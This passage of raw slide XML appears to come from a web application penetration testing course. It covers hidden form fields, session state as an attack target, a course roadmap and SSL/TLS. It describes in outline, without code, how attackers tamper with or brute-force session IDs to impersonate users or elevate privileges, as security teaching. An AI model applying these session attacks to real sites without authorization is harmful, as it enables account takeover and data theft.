            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="1615440"/>
            <a:ext cx="7772400" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Forms are used for user input</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>But they can also be pre-populated the server in the response it sends back to the browser</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Form fields that are marked </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="2400">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>hidden</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="2400">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t> are not displayed to the user</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Forms can have a mixture of visible and hidden fields…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>…Or, they can have entirely hidden fields</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>User doesn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>'t see form, but its values are passed back to the server as part of the next request</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>For example, the source HTML may contain:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>&lt;input type="hidden" name="username" value="c_smith"&gt;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a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Attacker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>'s Perspective of </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Session State</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Tahoma" charset="0"/>
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="93187" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Session state is a major target</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Multiple tools are used to attack session</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Interception proxies provide access to sessions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Scripts to brute force session IDs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Changing session ID can:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Give attacker access as someone else</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Disclose sensitive information</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Elevate attacker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>'s privileges</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Much more!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41"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="219075" y="152400"/>
            <a:ext cx="8734425" cy="1175273"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Course Roadmap</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rectangle 1042"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="304800" y="1981200"/>
            <a:ext cx="8458200" cy="41148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Attacker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="3200" b="1" i="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>'s View, Pen-</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ja-JP" sz="3200" b="1" i="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="3200" b="1" i="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Testing, &amp; Scoping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 Cont.</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Capture the Flag</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0">
              <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
              <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Freeform 1044"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="blackWhite">
          <a:xfrm>
            <a:off x="5194300" y="152400"/>
            <a:ext cx="520700" cy="6248400"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 328"/>
              <a:gd name="T1" fmla="*/ 2147483647 h 3984"/>
              <a:gd name="T2" fmla="*/ 2147483647 w 328"/>
              <a:gd name="T3" fmla="*/ 0 h 3984"/>
              <a:gd name="T4" fmla="*/ 2147483647 w 328"/>
              <a:gd name="T5" fmla="*/ 2147483647 h 3984"/>
              <a:gd name="T6" fmla="*/ 0 w 328"/>
              <a:gd name="T7" fmla="*/ 2147483647 h 3984"/>
              <a:gd name="T8" fmla="*/ 0 60000 65536"/>
              <a:gd name="T9" fmla="*/ 0 60000 65536"/>
              <a:gd name="T10" fmla="*/ 0 60000 65536"/>
              <a:gd name="T11" fmla="*/ 0 60000 65536"/>
              <a:gd name="T12" fmla="*/ 0 w 328"/>
              <a:gd name="T13" fmla="*/ 0 h 3984"/>
              <a:gd name="T14" fmla="*/ 328 w 328"/>
              <a:gd name="T15" fmla="*/ 3984 h 3984"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="T8">
                <a:pos x="T0" y="T1"/>
              </a:cxn>
              <a:cxn ang="T9">
                <a:pos x="T2" y="T3"/>
              </a:cxn>
              <a:cxn ang="T10">
                <a:pos x="T4" y="T5"/>
              </a:cxn>
              <a:cxn ang="T11">
                <a:pos x="T6" y="T7"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="T12" t="T13" r="T14" b="T15"/>
            <a:pathLst>
              <a:path w="328" h="3984">
                <a:moveTo>
                  <a:pt x="0" y="1445"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="109" y="963"/>
                  <a:pt x="219" y="482"/>
                  <a:pt x="328" y="0"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="328" y="3984"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="219" y="3105"/>
                  <a:pt x="109" y="2324"/>
                  <a:pt x="0" y="1445"/>
                </a:cubicBez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
        <p:nvSpPr>
          <p:cNvPr id="11" name="Rectangle 1043"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5715000" y="152400"/>
            <a:ext cx="3276600" cy="6705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eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" i="1" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Why the Web?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> Web App Pen Testing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> Web Site Server Architecture</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> The HTTP Protocol</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> HTTP Methods</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>HTTP Status Codes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>WebSockets</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> Exercise: Examining HTTP</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>    Requests and Responses</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> Client Authentication</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> Exercise: Client Authentication</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> Session Tracking</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> HTTPS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> Exercise: Analyzing HTTPS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> SamuraiWTF</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Penetration Testing Types and </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>   Methods</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> Web App Pen Test Components</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> Reporting and Presenting Findings</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> Attack Methodology</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> Types of Flaws</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000"/>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>JavaScript for Pen Testers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> Statements, Variables,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Functions, &amp; Events</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> The DOM, Methods, and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Properties</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> AJAX and XMLHttpRequest</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> JavaScript Exercise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685800" y="137160"/>
            <a:ext cx="7772400" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Encrypting HTTP in Transit</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="95235" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="381000" y="1310640"/>
            <a:ext cx="8382000" cy="4114800"/>
          </a:xfrm>
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>SSL/TLS are two common options for encrypting HTTP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>TLS is the successor to SSL</a:t>
